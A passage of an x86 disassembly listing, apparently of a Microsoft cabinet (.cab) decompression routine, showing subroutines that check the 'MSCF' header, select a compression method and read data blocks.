movzx eax, word ptr [esi+72h]
push edi
mov [edi+10h], eax
call dword ptr [esi+28h]
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_10043B5
loc_10043A7: ; CODE XREF: sub_100431E+50�j
push ebx
push 0Bh
push dword ptr [esi]
call sub_1005350
xor eax, eax
jmp short loc_10043B8
; ---------------------------------------------------------------------------
loc_10043B5: ; CODE XREF: sub_100431E+55�j
; sub_100431E+87�j
xor eax, eax
inc eax
loc_10043B8: ; CODE XREF: sub_100431E+95�j
pop edi
pop esi
pop ebx
retn 4
sub_100431E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10043BE proc near ; CODE XREF: sub_1004F1F+2F�p
; sub_1004F1F+55�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push dword ptr [esi+0A8h]
lea ebx, [esi+7E4h]
push dword ptr [esi+48h]
push dword ptr [esi+84h]
call dword ptr [esi+10h]
add esp, 0Ch
cmp [esi+0A8h], eax
jnz loc_10044DC
mov eax, [esi+48h]
movzx eax, word ptr [eax+4]
mov ecx, [ebp+arg_4]
add eax, ecx
cmp eax, [esi+98h]
ja loc_10044DC
mov edi, [esi+48h]
movzx eax, word ptr [edi+4]
push eax
mov [ebp+arg_0], eax
mov eax, [esi+3Ch]
add eax, ecx
push eax
push dword ptr [esi+84h]
call dword ptr [esi+10h]
add esp, 0Ch
cmp [ebp+arg_0], eax
jnz loc_10044DC
xor edx, edx
cmp [edi], edx
jz short loc_1004462
mov eax, [esi+3Ch]
add eax, [ebp+arg_4]
push edx
push [ebp+arg_0]
push eax
call sub_100536B
push eax
mov eax, [esi+0A8h]
sub eax, 4
push eax
mov eax, [esi+48h]
add eax, 4
push eax
call sub_100536B
mov edi, [esi+48h]
cmp eax, [edi]
jnz short loc_10044DC
xor edx, edx
loc_1004462: ; CODE XREF: sub_10043BE+72�j
mov ecx, [ebp+arg_4]
add [edi+4], cx
cmp ecx, edx
ja short loc_100447A
mov eax, [esi+48h]
cmp [eax+6], dx
jz short loc_100447A
xor edi, edi
jmp short loc_100447D
; ---------------------------------------------------------------------------
loc_100447A: ; CODE XREF: sub_10043BE+AD�j
; sub_10043BE+B6�j
xor edi, edi
inc edi
loc_100447D: ; CODE XREF: sub_10043BE+BA�j
cmp [esi+28h], edx
jz short loc_10044D7
mov dword ptr [ebx], 2
mov eax, [esi+38h]
mov [ebx+4], eax
mov ax, [esi+0A8h]
sub ax, 8
mov [ebx+0Ch], ax
jz short loc_10044AA
mov eax, [esi+48h]
add eax, 8
mov [ebx+8], eax
jmp short loc_10044AD
; ---------------------------------------------------------------------------
loc_10044AA: ; CODE XREF: sub_10043BE+DF�j
mov [ebx+8], edx
loc_10044AD: ; CODE XREF: sub_10043BE+EA�j
mov eax, [esi+3Ch]
add eax, ecx
mov [ebx+10h], eax
mov eax, [esi+48h]
mov ax, [eax+4]
push ebx
mov [ebx+14h], ax
mov [ebx+18h], edi
mov [ebx+1Ch], cx
call dword ptr [esi+28h]
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_10044D7
push 0
push 0Bh
jmp short loc_10044E0
; ---------------------------------------------------------------------------
loc_10044D7: ; CODE XREF: sub_10043BE+C2�j
; sub_10043BE+111�j
xor eax, eax
inc eax
jmp short loc_10044E9
; ---------------------------------------------------------------------------
loc_10044DC: ; CODE XREF: sub_10043BE+2A�j
; sub_10043BE+42�j ...
push 0
push 4
loc_10044E0: ; CODE XREF: sub_10043BE+117�j
push dword ptr [esi]
call sub_1005350
xor eax, eax
loc_10044E9: ; CODE XREF: sub_10043BE+11C�j
pop edi
pop esi
pop ebx
pop ebp
retn 8
sub_10043BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10044F0 proc near ; CODE XREF: sub_10049B0+1FA�p
; sub_10049B0+210�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
push 1
push 0
push dword ptr [esi+88h]
call dword ptr [esi+1Ch]
mov ebx, [ebp+arg_4]
mov edi, [ebp+arg_0]
push ebx
push edi
push dword ptr [esi+88h]
mov [ebp+arg_8], eax
call dword ptr [esi+10h]
add esp, 18h
test eax, eax
jle short loc_100455E
mov cl, [edi+ebx-1]
and byte ptr [edi+ebx-1], 0
mov eax, edi
lea edi, [eax+1]
loc_100452F: ; CODE XREF: sub_10044F0+44�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_100452F
sub eax, edi
lea edx, [eax+1]
cmp edx, ebx
jl short loc_1004543
test cl, cl
jnz short loc_100455E
loc_1004543: ; CODE XREF: sub_10044F0+4D�j
mov ecx, [ebp+arg_8]
push 0
lea eax, [eax+ecx+1]
push eax
push dword ptr [esi+88h]
call dword ptr [esi+1Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_100456D
loc_100455E: ; CODE XREF: sub_10044F0+2F�j
; sub_10044F0+51�j
push 0
push 4
push dword ptr [esi]
call sub_1005350
xor eax, eax
jmp short loc_1004570
; ---------------------------------------------------------------------------
loc_100456D: ; CODE XREF: sub_10044F0+6C�j
xor eax, eax
inc eax
loc_1004570: ; CODE XREF: sub_10044F0+7B�j
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_10044F0 endp
; =============== S U B R O U T I N E =======================================
sub_1004577 proc near ; CODE XREF: sub_1005170+7B�p
; sub_1005170+189�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
push 1
push 0
push dword ptr [esi+88h]
call dword ptr [esi+1Ch]
mov ebx, eax
add esp, 0Ch
cmp ebx, 0FFFFFFFFh
jnz short loc_10045A3
push 0
push 4
push dword ptr [esi]
call sub_1005350
xor eax, eax
jmp short loc_100461B
; ---------------------------------------------------------------------------
loc_10045A3: ; CODE XREF: sub_1004577+1B�j
mov ax, [esi+0ACh]
push edi
mov [esi+7DEh], ax
mov ax, [esi+70h]
lea edi, [esi+7BCh]
mov [esi+7DAh], ax
mov eax, [esi+38h]
push edi
push 5
mov [edi], ebx
mov [esi+7CCh], eax
call dword ptr [esi+24h]
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_10045EA
loc_10045DB: ; CODE XREF: sub_1004577+9E�j
push 0
push 0Bh
push dword ptr [esi]
call sub_1005350
xor eax, eax
jmp short loc_100461A
; ---------------------------------------------------------------------------
loc_10045EA: ; CODE XREF: sub_1004577+62�j
mov ax, [esi+7DEh]
test ax, ax
mov [esi+0ACh], ax
jz short loc_1004617
mov edi, [edi]
cmp edi, ebx
jz short loc_1004617
push 0
push edi
push dword ptr [esi+88h]
call dword ptr [esi+1Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_10045DB
loc_1004617: ; CODE XREF: sub_1004577+84�j
; sub_1004577+8A�j
xor eax, eax
inc eax
loc_100461A: ; CODE XREF: sub_1004577+71�j
pop edi
loc_100461B: ; CODE XREF: sub_1004577+2A�j
pop esi
pop ebx
retn 4
sub_1004577 endp
; =============== S U B R O U T I N E =======================================
sub_1004620 proc near ; CODE XREF: sub_1004CBC+1A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
mov al, [esi+0B2h]
push edi
xor edi, edi
and eax, 0Fh
sub eax, edi
jz short loc_1004679
dec eax
jz short loc_1004667
dec eax
jz short loc_100465D
dec eax
jz short loc_1004653
sub eax, 0Ch
jz short loc_1004687
push edi
push 6
loc_1004648: ; CODE XREF: sub_1004620+57�j
push dword ptr [esi]
call sub_1005350
xor eax, eax
jmp short loc_100468A
; ---------------------------------------------------------------------------
loc_1004653: ; CODE XREF: sub_1004620+1E�j
push dword ptr [esi+34h]
call sub_10054F6
jmp short loc_100466F
; ---------------------------------------------------------------------------
loc_100465D: ; CODE XREF: sub_1004620+1B�j
push dword ptr [esi+34h]
call nullsub_1
jmp short loc_100466F
; ---------------------------------------------------------------------------
loc_1004667: ; CODE XREF: sub_1004620+18�j
push dword ptr [esi+34h]
call nullsub_1
loc_100466F: ; CODE XREF: sub_1004620+3B�j
; sub_1004620+45�j
test eax, eax
pop ecx
jz short loc_1004679
push edi
push 7
jmp short loc_1004648
; ---------------------------------------------------------------------------
loc_1004679: ; CODE XREF: sub_1004620+15�j
; sub_1004620+52�j
push dword ptr [esi+3Ch]
call dword ptr [esi+4]
push dword ptr [esi+40h]
call dword ptr [esi+4]
pop ecx
pop ecx
loc_1004687: ; CODE XREF: sub_1004620+23�j
xor eax, eax
inc eax
loc_100468A: ; CODE XREF: sub_1004620+31�j
pop edi
pop esi
retn 4
sub_1004620 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100468F proc near ; CODE XREF: sub_1004CBC+39�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_0]
movzx ecx, word ptr [esi+0B2h]
mov eax, ecx
push edi
and eax, 0Fh
xor edi, edi
sub eax, edi
lea edx, [esi+94h]
mov dword ptr [edx], 8000h
jz loc_100474A
dec eax
jz short loc_1004729
dec eax
jz short loc_10046FF
dec eax
jz short loc_10046D3
sub eax, 0Ch
jz loc_1004846
push 6
jmp short loc_1004742
; ---------------------------------------------------------------------------
loc_10046D3: ; CODE XREF: sub_100468F+35�j
push edi
push edi
push edi
push edi
xor eax, eax
push edi
shr ecx, 8
inc eax
push edi
and ecx, 1Fh
shl eax, cl
lea ebx, [esi+98h]
push ebx
push edi
mov [ebp+var_10], eax
push edi
lea eax, [ebp+var_10]
push eax
push edx
call sub_10053CE
loc_10046FA: ; CODE XREF: sub_100468F+98�j
add esp, 2Ch
jmp short loc_100473C
; ---------------------------------------------------------------------------
loc_10046FF: ; CODE XREF: sub_100468F+32�j
mov eax, [esi+20h]
push edi
push edi
push edi
push edi
push edi
push edi
lea ebx, [esi+98h]
push ebx
push edi
mov [ebp+var_4], eax
push edi
lea eax, [ebp+var_8]
shr ecx, 8
push eax
and ecx, 1Fh
push edx
mov [ebp+var_8], ecx
call sub_1002BED
jmp short loc_10046FA
; ---------------------------------------------------------------------------
loc_1004729: ; CODE XREF: sub_100468F+2F�j
push edi
lea ebx, [esi+98h]
push ebx
push edi
push edi
push edx
call sub_1002BED
add esp, 14h
loc_100473C: ; CODE XREF: sub_100468F+6E�j
test eax, eax
jz short loc_1004756
push 7
loc_1004742: ; CODE XREF: sub_100468F+42�j
pop eax
push edi
push eax
jmp loc_1004832
; ---------------------------------------------------------------------------
loc_100474A: ; CODE XREF: sub_100468F+28�j
lea ebx, [esi+98h]
mov dword ptr [ebx], 8000h
loc_1004756: ; CODE XREF: sub_100468F+AF�j
push dword ptr [ebx]
call dword ptr [esi+8]
cmp eax, edi
pop ecx
mov [esi+3Ch], eax
jnz short loc_100476B
loc_1004763: ; CODE XREF: sub_100468F+F4�j
push edi
push 5
jmp loc_1004832
; ---------------------------------------------------------------------------
loc_100476B: ; CODE XREF: sub_100468F+D2�j
push dword ptr [esi+94h]
call dword ptr [esi+8]
cmp eax, edi
pop ecx
mov [esi+40h], eax
jnz short loc_1004785
push dword ptr [esi+3Ch]
call dword ptr [esi+4]
pop ecx
jmp short loc_1004763
; ---------------------------------------------------------------------------
loc_1004785: ; CODE XREF: sub_100468F+EB�j
xor eax, eax
mov al, [esi+0B2h]
and eax, 0Fh
dec eax
jz short loc_10047F8
dec eax
jz short loc_10047C9
dec eax
jnz loc_1004846
push dword ptr [esi+1Ch]
lea eax, [esi+34h]
push dword ptr [esi+18h]
push dword ptr [esi+14h]
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push eax
push ebx
push dword ptr [esi+4]
lea eax, [ebp+var_10]
push dword ptr [esi+8]
push eax
lea eax, [esi+94h]
push eax
call sub_10053CE
jmp short loc_10047F3
; ---------------------------------------------------------------------------
loc_10047C9: ; CODE XREF: sub_100468F+105�j
push dword ptr [esi+1Ch]
lea eax, [esi+34h]
push dword ptr [esi+18h]
push dword ptr [esi+14h]
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push eax
push ebx
push dword ptr [esi+4]
lea eax, [ebp+var_8]
push dword ptr [esi+8]
push eax
lea eax, [esi+94h]
push eax
call sub_1002BED
loc_10047F3: ; CODE XREF: sub_100468F+138�j
add esp, 2Ch
jmp short loc_1004812
; ---------------------------------------------------------------------------
loc_10047F8: ; CODE XREF: sub_100468F+102�j
lea eax, [esi+34h]
push eax
push ebx
push dword ptr [esi+4]
lea eax, [esi+94h]
push dword ptr [esi+8]
push eax
call sub_1002BED
add esp, 14h
loc_1004812: ; CODE XREF: sub_100468F+167�j
cmp eax, edi
jz short loc_1004846
push dword ptr [esi+3Ch]
xor ebx, ebx
cmp eax, 1
setnz bl
lea ebx, [ebx+ebx+5]
call dword ptr [esi+4]
push dword ptr [esi+40h]
call dword ptr [esi+4]
pop ecx
pop ecx
push edi
push ebx
loc_1004832: ; CODE XREF: sub_100468F+B6�j
; sub_100468F+D7�j
push dword ptr [esi]
call sub_1005350
mov word ptr [esi+0B2h], 0Fh
xor eax, eax
jmp short loc_1004849
; ---------------------------------------------------------------------------
loc_1004846: ; CODE XREF: sub_100468F+3A�j
; sub_100468F+108�j ...
xor eax, eax
inc eax
loc_1004849: ; CODE XREF: sub_100468F+1B5�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_100468F endp
; =============== S U B R O U T I N E =======================================
sub_1004850 proc near ; CODE XREF: sub_1004FC0+33�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
mov al, [esi+0B2h]
push edi
xor edi, edi
and eax, 0Fh
sub eax, edi
jz short loc_10048A9
dec eax
jz short loc_1004897
dec eax
jz short loc_100488D
dec eax
jz short loc_1004883
sub eax, 0Ch
jz short loc_10048A9
push edi
push 6
loc_1004878: ; CODE XREF: sub_1004850+57�j
push dword ptr [esi]
call sub_1005350
xor eax, eax
jmp short loc_10048AC
; ---------------------------------------------------------------------------
loc_1004883: ; CODE XREF: sub_1004850+1E�j
push dword ptr [esi+34h]
call sub_10054DB
jmp short loc_100489F
; ---------------------------------------------------------------------------
loc_100488D: ; CODE XREF: sub_1004850+1B�j
push dword ptr [esi+34h]
call nullsub_1
jmp short loc_100489F
; ---------------------------------------------------------------------------
loc_1004897: ; CODE XREF: sub_1004850+18�j
push dword ptr [esi+34h]
call nullsub_1
loc_100489F: ; CODE XREF: sub_1004850+3B�j
; sub_1004850+45�j
test eax, eax
pop ecx
jz short loc_10048A9
push edi
push 7
jmp short loc_1004878
; ---------------------------------------------------------------------------
loc_10048A9: ; CODE XREF: sub_1004850+15�j
; sub_1004850+23�j ...
xor eax, eax
inc eax
loc_10048AC: ; CODE XREF: sub_1004850+31�j
pop edi
pop esi
retn 4
sub_1004850 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10048B1 proc near ; CODE XREF: sub_1004F1F+74�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor eax, eax
mov al, [edi+0B2h]
xor ebx, ebx
and eax, 0Fh
sub eax, ebx
jz loc_1004982
dec eax
jz short loc_1004944
dec eax
jz short loc_100491F
dec eax
jz short loc_10048E9
push ebx
push 6
loc_10048DB: ; CODE XREF: sub_10048B1+C0�j
push dword ptr [edi]
call sub_1005350
xor eax, eax
jmp loc_10049A9
; ---------------------------------------------------------------------------
loc_10048E9: ; CODE XREF: sub_10048B1+25�j
mov esi, [ebp+arg_4]
movzx eax, word ptr [esi]
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push eax
mov eax, [edi+48h]
push dword ptr [edi+40h]
movzx eax, word ptr [eax+4]
push eax
push dword ptr [edi+3Ch]
push dword ptr [edi+34h]
call sub_100548D
loc_100490C: ; CODE XREF: sub_10048B1+91�j
add esp, 14h
test eax, eax
jnz short loc_100496E
mov ax, word ptr [ebp+arg_0]
mov [esi], ax
jmp loc_10049A6
; ---------------------------------------------------------------------------
loc_100491F: ; CODE XREF: sub_10048B1+22�j
mov esi, [ebp+arg_4]
movzx eax, word ptr [esi]
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push eax
mov eax, [edi+48h]
push dword ptr [edi+40h]
movzx eax, word ptr [eax+4]
push eax
push dword ptr [edi+3Ch]
push dword ptr [edi+34h]
call nullsub_1
jmp short loc_100490C
; ---------------------------------------------------------------------------
loc_1004944: ; CODE XREF: sub_10048B1+1F�j
mov eax, [edi+94h]
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push eax
mov eax, [edi+48h]
push dword ptr [edi+40h]
movzx eax, word ptr [eax+4]
push eax
push dword ptr [edi+3Ch]
push dword ptr [edi+34h]
call nullsub_1
add esp, 14h
test eax, eax
jz short loc_1004976
loc_100496E: ; CODE XREF: sub_10048B1+60�j
push ebx
push 7
jmp loc_10048DB
; ---------------------------------------------------------------------------
loc_1004976: ; CODE XREF: sub_10048B1+BB�j
mov eax, [ebp+arg_4]
mov cx, word ptr [ebp+arg_0]
mov [eax], cx
jmp short loc_10049A6
; ---------------------------------------------------------------------------
loc_1004982: ; CODE XREF: sub_10048B1+18�j
mov eax, [edi+48h]
mov ax, [eax+4]
mov ecx, [ebp+arg_4]
mov [ecx], ax
mov esi, [edi+3Ch]
mov edi, [edi+40h]
movzx ecx, ax
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_10049A6: ; CODE XREF: sub_10048B1+69�j
; sub_10048B1+CF�j
xor eax, eax
inc eax
loc_10049A9: ; CODE XREF: sub_10048B1+33�j
pop edi
pop esi
pop ebx
pop ebp
retn 8
sub_10048B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10049B0 proc near ; CODE XREF: sub_1004DF4+A1�p
; sub_1005170+4F�p
var_24 = dword ptr -24h
var_C = word ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
arg_C = word ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
push esi
lea eax, [ebx+5B9h]
lea edx, [ebx+6BAh]
push edi
sub edx, eax
loc_10049CA: ; CODE XREF: sub_10049B0+22�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_10049CA
mov eax, [ebp+arg_4]
mov esi, eax
loc_10049D9: ; CODE XREF: sub_10049B0+2E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_10049D9
lea edi, [ebx+6BAh]
sub eax, esi
dec edi
loc_10049E9: ; CODE XREF: sub_10049B0+3F�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_10049E9
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, 180h
push edi
mov esi, 8000h
lea eax, [ebx+6BAh]
push esi
push eax
call dword ptr [ebx+0Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebx+88h], eax
jz loc_1004C60
push edi
lea eax, [ebx+6BAh]
push esi
push eax
call dword ptr [ebx+0Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebx+84h], eax
jz loc_1004C60
push 24h
lea eax, [ebp+var_24]
push eax
push dword ptr [ebx+88h]
call dword ptr [ebx+10h]
add esp, 0Ch
cmp eax, 24h
jz short loc_1004A63
loc_1004A5C: ; CODE XREF: sub_10049B0+BA�j
push 0
jmp loc_1004B31
; ---------------------------------------------------------------------------
loc_1004A63: ; CODE XREF: sub_10049B0+AA�j
cmp [ebp+var_24], 4643534Dh
jnz short loc_1004A5C
cmp [ebp+var_C], 103h
jz short loc_1004A80
movzx eax, [ebp+var_C]
push eax
push 3
jmp loc_1004C64
; ---------------------------------------------------------------------------
loc_1004A80: ; CODE XREF: sub_10049B0+C2�j
mov ax, [ebp+arg_C]
cmp ax, 0FFFFh
jz short loc_1004AA3
mov cx, [ebp+arg_8]
cmp cx, [ebp+var_4]
jnz short loc_1004A9A
cmp ax, [ebp+var_2]
jz short loc_1004AA3
loc_1004A9A: ; CODE XREF: sub_10049B0+E2�j
push 0
push 0Ah
jmp loc_1004C64
; ---------------------------------------------------------------------------
loc_1004AA3: ; CODE XREF: sub_10049B0+D8�j
; sub_10049B0+E8�j
and byte ptr [ebp+arg_0+2], 0
and byte ptr [ebp+arg_0+3], 0
push 9
lea edi, [ebx+50h]
pop ecx
lea esi, [ebp+var_24]
rep movsd
xor edi, edi
test byte ptr [ebx+6Eh], 4
mov word ptr [ebp+arg_0], di
jz short loc_1004AD9
push 4
lea eax, [ebp+arg_0]
push eax
push dword ptr [ebx+88h]
call dword ptr [ebx+10h]
add esp, 0Ch
cmp eax, 4
jnz short loc_1004B30
loc_1004AD9: ; CODE XREF: sub_10049B0+110�j
movzx eax, word ptr [ebp+arg_0]
cmp [ebx+0A0h], eax
jz short loc_1004B0E
mov eax, [ebx+4Ch]
cmp eax, edi
jz short loc_1004AF4
push eax
call dword ptr [ebx+4]
pop ecx
mov [ebx+4Ch], edi
loc_1004AF4: ; CODE XREF: sub_10049B0+13A�j
movzx eax, word ptr [ebp+arg_0]
cmp eax, edi
mov [ebx+0A0h], eax
jbe short loc_1004B0E
push eax
call dword ptr [ebx+8]
cmp eax, edi
pop ecx
mov [ebx+4Ch], eax
jz short loc_1004B7E
loc_1004B0E: ; CODE XREF: sub_10049B0+133�j
; sub_10049B0+150�j
mov eax, [ebx+0A0h]
cmp eax, edi
jbe short loc_1004B38
push eax
push dword ptr [ebx+4Ch]
push dword ptr [ebx+88h]
call dword ptr [ebx+10h]
add esp, 0Ch
cmp [ebx+0A0h], eax
jz short loc_1004B38
loc_1004B30: ; CODE XREF: sub_10049B0+127�j
push edi
loc_1004B31: ; CODE XREF: sub_10049B0+AE�j
push 2
jmp loc_1004C64
; ---------------------------------------------------------------------------
loc_1004B38: ; CODE XREF: sub_10049B0+166�j
; sub_10049B0+17E�j
movzx eax, byte ptr [ebp+arg_0+2]
add eax, 8
cmp [ebx+44h], edi
jnz short loc_1004B58
push eax
mov [ebx+0A4h], eax
call dword ptr [ebx+8]
cmp eax, edi
pop ecx
mov [ebx+44h], eax
jnz short loc_1004B60
jmp short loc_1004B7E
; ---------------------------------------------------------------------------
loc_1004B58: ; CODE XREF: sub_10049B0+192�j
cmp eax, [ebx+0A4h]
jnz short loc_1004B8E
loc_1004B60: ; CODE XREF: sub_10049B0+1A4�j
movzx eax, byte ptr [ebp+arg_0+3]
add eax, 8
cmp [ebx+48h], edi
jnz short loc_1004B86
push eax
mov [ebx+0A8h], eax
call dword ptr [ebx+8]
cmp eax, edi
pop ecx
mov [ebx+48h], eax
jnz short loc_1004B96
loc_1004B7E: ; CODE XREF: sub_10049B0+15C�j
; sub_10049B0+1A6�j
push edi
push 5
jmp loc_1004C64
; ---------------------------------------------------------------------------
loc_1004B86: ; CODE XREF: sub_10049B0+1BA�j
cmp eax, [ebx+0A8h]
jz short loc_1004B96
loc_1004B8E: ; CODE XREF: sub_10049B0+1AE�j
push edi
push 9
jmp loc_1004C64
; ---------------------------------------------------------------------------
loc_1004B96: ; CODE XREF: sub_10049B0+1CC�j
; sub_10049B0+1DC�j
test byte ptr [ebx+6Eh], 1
mov esi, 100h
jz short loc_1004BCE
push ebx
push esi
lea eax, [ebx+1B5h]
push eax
call sub_10044F0
test eax, eax
jz loc_1004C6B
push ebx
push esi
lea eax, [ebx+2B6h]
push eax
call sub_10044F0
test eax, eax
jnz short loc_1004BDC
jmp loc_1004C6B
; ---------------------------------------------------------------------------
loc_1004BCE: ; CODE XREF: sub_10049B0+1EF�j
and byte ptr [ebx+1B5h], 0
and byte ptr [ebx+2B6h], 0
loc_1004BDC: ; CODE XREF: sub_10049B0+217�j
test byte ptr [ebx+6Eh], 2
jz short loc_1004C08
push ebx
push esi
lea eax, [ebx+3B7h]
push eax
call sub_10044F0
test eax, eax
jz short loc_1004C6B
push ebx
push esi
lea eax, [ebx+4B8h]
push eax
call sub_10044F0
test eax, eax
jnz short loc_1004C16
jmp short loc_1004C6B
; ---------------------------------------------------------------------------
loc_1004C08: ; CODE XREF: sub_10049B0+230�j
and byte ptr [ebx+3B7h], 0
and byte ptr [ebx+4B8h], 0
loc_1004C16: ; CODE XREF: sub_10049B0+254�j
push 1
push edi
push dword ptr [ebx+88h]
call dword ptr [ebx+1Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebx+2Ch], eax
push edi
jz short loc_1004C43
push dword ptr [ebx+60h]
push dword ptr [ebx+88h]
call dword ptr [ebx+1Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_1004C47
push edi
loc_1004C43: ; CODE XREF: sub_10049B0+27C�j
push 4
jmp short loc_1004C64
; ---------------------------------------------------------------------------
loc_1004C47: ; CODE XREF: sub_10049B0+290�j
mov ax, [ebx+6Ch]
push ebx
mov [ebx+0ACh], ax
call sub_100431E
neg eax
sbb eax, eax
neg eax
jmp short loc_1004C6D
; ---------------------------------------------------------------------------
loc_1004C60: ; CODE XREF: sub_10049B0+71�j
; sub_10049B0+8F�j
push 0
push 1
loc_1004C64: ; CODE XREF: sub_10049B0+CB�j
; sub_10049B0+EE�j ...
push dword ptr [ebx]
call sub_1005350
loc_1004C6B: ; CODE XREF: sub_10049B0+201�j
; sub_10049B0+219�j ...
xor eax, eax
loc_1004C6D: ; CODE XREF: sub_10049B0+2AE�j
pop edi
pop esi
pop ebx
leave
retn 10h
sub_10049B0 endp
; =============== S U B R O U T I N E =======================================
sub_1004C74 proc near ; CODE XREF: sub_1004DF4+108�p
; sub_1005170+97�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 10h
lea eax, [esi+74h]
push eax
push dword ptr [esi+88h]
call dword ptr [esi+10h]
add esp, 0Ch
cmp eax, 10h
jnz short loc_1004CAB
push esi
push 100h
lea eax, [esi+0B4h]
push eax
call sub_10044F0
test eax, eax
jz short loc_1004CAB
xor eax, eax
inc eax
jmp short loc_1004CB8
; ---------------------------------------------------------------------------
loc_1004CAB: ; CODE XREF: sub_1004C74+1A�j
; sub_1004C74+30�j
push 0
push 4
push dword ptr [esi]
call sub_1005350
xor eax, eax
loc_1004CB8: ; CODE XREF: sub_1004C74+35�j
pop esi
retn 4
sub_1004C74 endp
; =============== S U B R O U T I N E =======================================
sub_1004CBC proc near ; CODE XREF: sub_1004D05+88�p
arg_0 = word ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
push edi
mov di, [esp+8+arg_0]
cmp di, [esi+0B2h]
jnz short loc_1004CD5
xor eax, eax
inc eax
jmp short loc_1004D00
; ---------------------------------------------------------------------------
loc_1004CD5: ; CODE XREF: sub_1004CBC+12�j
push esi
call sub_1004620
test eax, eax
jnz short loc_1004CED
push eax
push 7
push dword ptr [esi]
call sub_1005350
xor eax, eax
jmp short loc_1004D00
; ---------------------------------------------------------------------------
loc_1004CED: ; CODE XREF: sub_1004CBC+21�j
push esi
mov [esi+0B2h], di
call sub_100468F
neg eax
sbb eax, eax
neg eax
loc_1004D00: ; CODE XREF: sub_1004CBC+17�j
; sub_1004CBC+2F�j
pop edi
pop esi
retn 8
sub_1004CBC endp
; =============== S U B R O U T I N E =======================================
sub_1004D05 proc near ; CODE XREF: sub_1004DF4+AD�p
; sub_1004FC0+3E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0A4h]
imul eax, ebx
add eax, [esi+2Ch]
push edi
push 0
push eax
push dword ptr [esi+84h]
lea edi, [esi+7E4h]
mov [esi+90h], ebx
call dword ptr [esi+1Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_1004DE1
push dword ptr [esi+0A4h]
push dword ptr [esi+44h]
push dword ptr [esi+84h]
call dword ptr [esi+10h]
add esp, 0Ch
cmp [esi+0A4h], eax
jnz loc_1004DE1
mov eax, [esi+44h]
push 0
push dword ptr [eax]
push dword ptr [esi+84h]
call dword ptr [esi+1Ch]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_1004DE1
mov eax, [esi+44h]
mov cx, [eax+4]
mov [esi+0B0h], cx
movzx eax, word ptr [eax+6]
push esi
push eax
call sub_1004CBC
test eax, eax
jz short loc_1004DEC
cmp dword ptr [esi+28h], 0
jz short loc_1004DDC
mov dword ptr [edi], 1
mov eax, [esi+38h]
mov [edi+4], eax
mov ax, [esi+0A4h]
sub ax, 8
mov [edi+0Ch], ax
jz short loc_1004DC4
mov eax, [esi+44h]
add eax, 8
mov [edi+8], eax
jmp short loc_1004DC8
; ---------------------------------------------------------------------------
loc_1004DC4: ; CODE XREF: sub_1004D05+B2�j
and dword ptr [edi+8], 0
loc_1004DC8: ; CODE XREF: sub_1004D05+BD�j
push edi
mov [edi+0Eh], bx
call dword ptr [esi+28h]
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_1004DDC
push 0
push 0Bh
jmp short loc_1004DE5
; ---------------------------------------------------------------------------
loc_1004DDC: ; CODE XREF: sub_1004D05+95�j
; sub_1004D05+CF�j
xor eax, eax
inc eax
jmp short loc_1004DEE
; ---------------------------------------------------------------------------
loc_1004DE1: ; CODE XREF: sub_1004D05+35�j
; sub_1004D05+56�j ...
push 0
push 4
loc_1004DE5: ; CODE XREF: sub_1004D05+D5�j
